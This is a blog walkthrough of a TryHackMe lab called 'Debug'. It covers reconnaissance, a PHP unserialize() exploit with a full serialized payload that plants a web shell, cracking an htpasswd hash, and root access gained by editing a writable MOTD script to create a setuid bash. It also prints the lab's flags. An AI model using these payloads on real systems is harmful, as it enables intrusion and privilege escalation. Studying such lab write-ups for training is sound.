DEV Community

Cover image for TryHackMe: Debug - Walkthrough
hamzairshad02
hamzairshad02

Posted on

TryHackMe: Debug - Walkthrough

Machine Link: Debug

Starting off with nmap

┌──(kali㉿kali)-[~]
└─$ nmap -T4 -A -v 10.10.69.115
Starting Nmap 7.91 ( https://nmap.org ) at 2023-09-23 08:02 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating Ping Scan at 08:02
Scanning 10.10.69.115 [2 ports]
Completed Ping Scan at 08:02, 0.44s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:02
Completed Parallel DNS resolution of 1 host. at 08:02, 0.00s elapsed
Initiating Connect Scan at 08:02
Scanning 10.10.69.115 [1000 ports]
Discovered open port 22/tcp on 10.10.69.115
Discovered open port 80/tcp on 10.10.69.115
Connect Scan Timing: About 32.68% done; ETC: 08:03 (0:01:04 remaining)
Increasing send delay for 10.10.69.115 from 0 to 5 due to max_successful_tryno increase to 5
Completed Connect Scan at 08:03, 62.64s elapsed (1000 total ports)
Initiating Service scan at 08:03
Scanning 2 services on 10.10.69.115
Completed Service scan at 08:03, 6.88s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.69.115.
Initiating NSE at 08:03
Completed NSE at 08:03, 19.40s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 1.72s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Nmap scan report for 10.10.69.115
Host is up (0.43s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA)
|   256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA)
|_  256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.42 seconds┌──(kali㉿kali)-[~]
└─$ nmap -T4 -A -v 10.10.69.115
Starting Nmap 7.91 ( https://nmap.org ) at 2023-09-23 08:02 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating Ping Scan at 08:02
Scanning 10.10.69.115 [2 ports]
Completed Ping Scan at 08:02, 0.44s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:02
Completed Parallel DNS resolution of 1 host. at 08:02, 0.00s elapsed
Initiating Connect Scan at 08:02
Scanning 10.10.69.115 [1000 ports]
Discovered open port 22/tcp on 10.10.69.115
Discovered open port 80/tcp on 10.10.69.115
Connect Scan Timing: About 32.68% done; ETC: 08:03 (0:01:04 remaining)
Increasing send delay for 10.10.69.115 from 0 to 5 due to max_successful_tryno increase to 5
Completed Connect Scan at 08:03, 62.64s elapsed (1000 total ports)
Initiating Service scan at 08:03
Scanning 2 services on 10.10.69.115
Completed Service scan at 08:03, 6.88s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.69.115.
Initiating NSE at 08:03
Completed NSE at 08:03, 19.40s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 1.72s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Nmap scan report for 10.10.69.115
Host is up (0.43s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA)
|   256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA)
|_  256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.42 seconds
Enter fullscreen mode Exit fullscreen mode

We find two ports; 22 (ssh) and 80 (http). Lets enumerate ssh first through the version that it is exposing and lets see if there’s an exploit to it.

Image description

Searching it up shows that it is vulnerable to username enumeration so lets launch metasploit and see if it can do something about it.

msf6 > search port:22 ssh enum

Matching Modules
================

   #  Name                                           Disclosure Date  Rank    Check  Description
   -  ----                                           ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/cerberus_sftp_enumusers  2014-05-27       normal  No     Cerberus FTP Server SFTP Username Enumeration
   1  auxiliary/scanner/ssh/ssh_enumusers                             normal  No     SSH Username Enumeration

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_enumusers                                             

msf6 > use 1
msf6 auxiliary(scanner/ssh/ssh_enumusers) >
Enter fullscreen mode Exit fullscreen mode

Searching up it shows that there is a ssh_enumusers scanner available so lets use it.

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/legion/wordlists/ssh-user.txt
USER_FILE => /usr/share/legion/wordlists/ssh-user.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 10.10.69.115:22 - SSH - Using malformed packet technique
[*] 10.10.69.115:22 - SSH - Starting scan
[+] 10.10.69.115:22 - SSH - User 'root' found
[!] No active DB -- Credential data will not be saved!
[+] 10.10.69.115:22 - SSH - User 'sysop' found
[+] 10.10.69.115:22 - SSH - User 'admin' found
[+] 10.10.69.115:22 - SSH - User 'admnistrator' found
[+] 10.10.69.115:22 - SSH - User 'superuser' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Enter fullscreen mode Exit fullscreen mode

Using the usual ssh-user.txt file present in Kali Linux it found all of these users to be the part of this machine. Well, that’s a little too much.

Image description

Checking out the port 80 it gives the typical Apache2 Ubuntu Default Page.

So we don’t have the password for ssh and the http port is just showing the default config page. What else can we do now? Start brute forcing things, right? Lets start with directory busting then.

┌──(kali㉿kali)-[~/dirsearch]
└─$ dirsearch -u http://10.10.69.115/ -t 100   

  _|. _ _  _  _  _ _|_    v0.4.2                                             
 (_||| _) (/_(_|| (_| )                                                      

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 100 | Wordlist size: 10927                                                             

Output File: /home/kali/.dirsearch/reports/10.10.69.115/-_23-09-23_08-39-55.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-09-23_08-39-55.log

Target: http://10.10.69.115/

[08:39:56] Starting: 
[08:40:20] 403 -  277B  - /.htaccess.sample                                
[08:40:20] 403 -  277B  - /.htaccess_sc                                    
[08:40:20] 403 -  277B  - /.htaccessBAK                                    
[08:40:20] 403 -  277B  - /.htaccess.orig
[08:40:20] 403 -  277B  - /.htaccess_orig                                  
[08:40:20] 403 -  277B  - /.htaccess.save
[08:40:20] 403 -  277B  - /.htaccessOLD2                                   
[08:40:20] 403 -  277B  - /.htaccess_extra                                 
[08:40:20] 403 -  277B  - /.htm
[08:40:21] 403 -  277B  - /.htpasswds                                      
[08:40:21] 403 -  277B  - /.html                                           
[08:40:21] 403 -  277B  - /.htaccess.bak1                                  
[08:40:21] 403 -  277B  - /.ht_wsr.txt
[08:40:21] 403 -  277B  - /.htaccessOLD                                    
[08:40:21] 403 -  277B  - /.httr-oauth                                     
[08:40:22] 403 -  277B  - /.htpasswd_test                                  
[08:40:23] 403 -  277B  - /.php                                            
[08:40:24] 403 -  277B  - /.php3                                           
[08:40:57] 301 -  313B  - /backup  ->  http://10.10.69.115/backup/          
[08:40:57] 200 -    2KB - /backup/                                          
[08:41:19] 200 -   11KB - /index.html                                       
[08:41:19] 200 -    6KB - /index.php                                        
[08:41:19] 200 -    6KB - /index.php/login/                                 
[08:41:22] 301 -  317B  - /javascript  ->  http://10.10.69.115/javascript/  
[08:41:43] 200 -    2KB - /readme.md                                        
[08:41:46] 403 -  277B  - /server-status/                                   
[08:41:48] 403 -  277B  - /server-status                                    

Task Completed
Enter fullscreen mode Exit fullscreen mode

Directory Busting through dirsearch did come up with some directories. Lets look into the most interesting one that is /index.php/login/

Image description

This page brings up a submit form. Throwing up XSS and SQL payloads won’t work. So lets dig deep and look for its code.

Viewing this page’s source will only give some useless HTML code. Lets find this index.php file somewhere else.

In our Directory Busting, /backup/ folder was found so lets see if it has the index.php file and it indeed has the backup file of it as index.php.bak.

<?php

class FormSubmit {

public $form_file = 'message.txt';
public $message = '';

public function SaveMessage() {

$NameArea = $_GET['name']; 
$EmailArea = $_GET['email'];
$TextArea = $_GET['comments'];

    $this-> message = "Message From : " . $NameArea . " || From Email : " . $EmailArea . " || Comment : " . $TextArea . "\n";

}

public function __destruct() {

file_put_contents(__DIR__ . '/' . $this->form_file,$this->message,FILE_APPEND);
echo 'Your submission has been successfully saved!';

}

}

// Leaving this for now... only for debug purposes... do not touch!

$debug = $_GET['debug'] ?? '';
$messageDebug = unserialize($debug);

$application = new FormSubmit;
$application -> SaveMessage();

?>
Enter fullscreen mode Exit fullscreen mode

Code gives a hint with the comments. So that must be where we should go further from. And as the description of machine said, we have to do PHP Deserialization so now is the time to do it.

The PHP code takes the name, email and comment passed in the GET by a form on the page. It uses those values to build a message that gets written to the file message.txt when the object is destructed. Lets test it out a little first by opening the following URL.

http://debug.thm/index.php?name=test&email=test&comments=test&select=1&checkbox=1

Then visiting this URL will validate our understanding.

http://debug.thm/message.txt

Image description

Now the part of code that has a comment on it tells us that if the URL contains a debug parameter, it will deserialize its content. That meant we could serialize an object of the class FormSubmit with the file and message we wanted. The server would then deserialize it, and when it would reach the end of the PHP block, the object would be out of scope and the class destructor would be called and our message would be written to the file of our choice.

So lets build a small code to fill in our shell.

<?php
class FormSubmit{
        public $form_file = 'test.php';
        public $message = '<?php system($_GET["cmd"]); ?>';
}
$obj = new FormSubmit();
echo serialize($obj);
?>
Enter fullscreen mode Exit fullscreen mode

Testing it out it gives us the serialized object.

└─$ php testing.php
O:10:"FormSubmit":2:{s:9:"form_file";s:8:"test.php";s:7:"message";s:30:"<?php system($_GET["cmd"]); ?>";}
Enter fullscreen mode Exit fullscreen mode

Now lets URL Encode it through CyberChef or any other URL Encoder and just use it with the debug parameter.

http://debug.thm/index.php?debug=O%3A10%3A"FormSubmit"%3A2%3A{s%3A9%3A"form_file"%3Bs%3A8%3A"test.php"%3Bs%3A7%3A"message"%3Bs%3A30%3A"<%3Fphp system(%24_GET["cmd"])%3B %3F>"%3B}

Lets visit the test.php file along with a command to see if our payload worked.

Image description

And it did. Running ls -al gives us a file called .htpasswd.

Image description

Looking into the file we see some goody good credentials.

Image description

The password seems like a hash so just crack it out.

└─$ john htpasswd.hash 
Created directory: /home/kali/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 20 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 15 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 23 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 21 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 13 candidates buffered for the current salt, minimum 24 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 14 candidates buffered for the current salt, minimum 24 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
jamaica          (james)
1g 0:00:00:00 DONE 2/3 (2023-09-23 10:57) 11.11g/s 20288p/s 20288c/s 20288C/s francine..me
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Enter fullscreen mode Exit fullscreen mode

Saving the collected hash in a htpasswd.hash file and running it through John The Ripper gives us the password. This means its SSH time!

┌──(kali㉿kali)-[~]
└─$ ssh james@10.10.69.115                                                            255 ⨯
The authenticity of host '10.10.69.115 (10.10.69.115)' can't be established.
ECDSA key fingerprint is SHA256:JCUiGJ9gC+EZEJeudS9yMKLVlE7MtpS2rolJudHcCbQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.69.115' (ECDSA) to the list of known hosts.
james@10.10.69.115's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

439 packages can be updated.
380 updates are security updates.

Last login: Wed Mar 10 18:36:58 2021 from 10.250.0.44
james@osboxes:~$ ls
Desktop    Downloads         Music              Pictures  Templates  Videos
Documents  examples.desktop  Note-To-James.txt  Public    user.txt
james@osboxes:~$ cat user.txt
7e37c84a66cc40b1c6bf700d08d28c20
Enter fullscreen mode Exit fullscreen mode

SSHing into the machine and opening user.txt gives us the first flag. Time to go to root now.

james@osboxes:~$ cat Note-To-James.txt
Dear James,

As you may already know, we are soon planning to submit this machine to THM's CyberSecurity Platform! Crazy... Isn't it? 

But there's still one thing I'd like you to do, before the submission.

Could you please make our ssh welcome message a bit more pretty... you know... something beautiful :D

I gave you access to modify all these files :) 

Oh and one last thing... You gotta hurry up! We don't have much time left until the submission!

Best Regards,

root
Enter fullscreen mode Exit fullscreen mode

Another file Note-To-James.txt is present inside the same directory which tells us the next steps. According to this note, we should be able to modify the Message Of The Day (motd).

james@osboxes:~$ ls -l /etc/update-motd.d/
total 28
-rwxrwxr-x 1 root james 1220 Mar 10  2021 00-header
-rwxrwxr-x 1 root james    0 Mar 10  2021 00-header.save
-rwxrwxr-x 1 root james 1157 Jun 14  2016 10-help-text
-rwxrwxr-x 1 root james   97 Dec  7  2018 90-updates-available
-rwxrwxr-x 1 root james  299 Jul 22  2016 91-release-upgrade
-rwxrwxr-x 1 root james  142 Dec  7  2018 98-fsck-at-reboot
-rwxrwxr-x 1 root james  144 Dec  7  2018 98-reboot-required
-rwxrwxr-x 1 root james  604 Nov  5  2017 99-esm
Enter fullscreen mode Exit fullscreen mode

We see that we have full rights to modify any of the file inside motd. Lets edit the very first file.

#!/bin/sh                                                                                                                                                               
cp /bin/bash /tmp/                                                                                                                                                      
chmod u+s /tmp/bash                                                                                                                                                     
#    00-header - create the header of the MOTD                                                                                                                          
#    Copyright (C) 2009-2010 Canonical Ltd.                                                                                                                             
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
        # Fall back to using the very slow lsb_release utility
        DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi

printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"
Enter fullscreen mode Exit fullscreen mode

I added two lines right beneath the shebang in the first line. Remember to use nano to edit the files since its the least painful of the command line text editors to exist.

Now just logout and SSH into the machine again to get your Message Of The Day (motd) and see if our added commands our gonna work to get root.

james@osboxes:~$ id
uid=1001(james) gid=1001(james) groups=1001(james)
james@osboxes:~$ /tmp/bash -p
bash-4.3# id
uid=1001(james) gid=1001(james) euid=0(root) groups=1001(james)
Enter fullscreen mode Exit fullscreen mode

Now that we login again and run the /tmp/bash -p we see that we went from 1001 to 0 real quick. We are at the root!

bash-4.3# ls
Desktop  Documents  Downloads  examples.desktop  Music  Note-To-James.txt  Pictures  Public  Templates  user.txt  Videos
bash-4.3# cd ..
bash-4.3# ls
james  lost+found
bash-4.3# ls -al
total 28
drwxr-xr-x  4 root  root   4096 Mar 10  2021 .
drwxr-xr-x 24 root  root   4096 Feb 28  2019 ..
drwx------ 17 james james  4096 Mar 10  2021 james
drwx------  2 root  root  16384 Feb 28  2019 lost+found
bash-4.3# cd ..
bash-4.3# ls
bin  boot  cdrom  dev  etc  home  initrd.img  initrd.img.old  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  snap  srv  sys  tmp  usr  var  vmlinuz
bash-4.3# cd root
bash-4.3# ls
root.txt
bash-4.3# cat root.txt
3c8c3d0fe758c320d158e32f68fabf4b
Enter fullscreen mode Exit fullscreen mode

Navigating a little more just leads us to the root flag.

Top comments (0)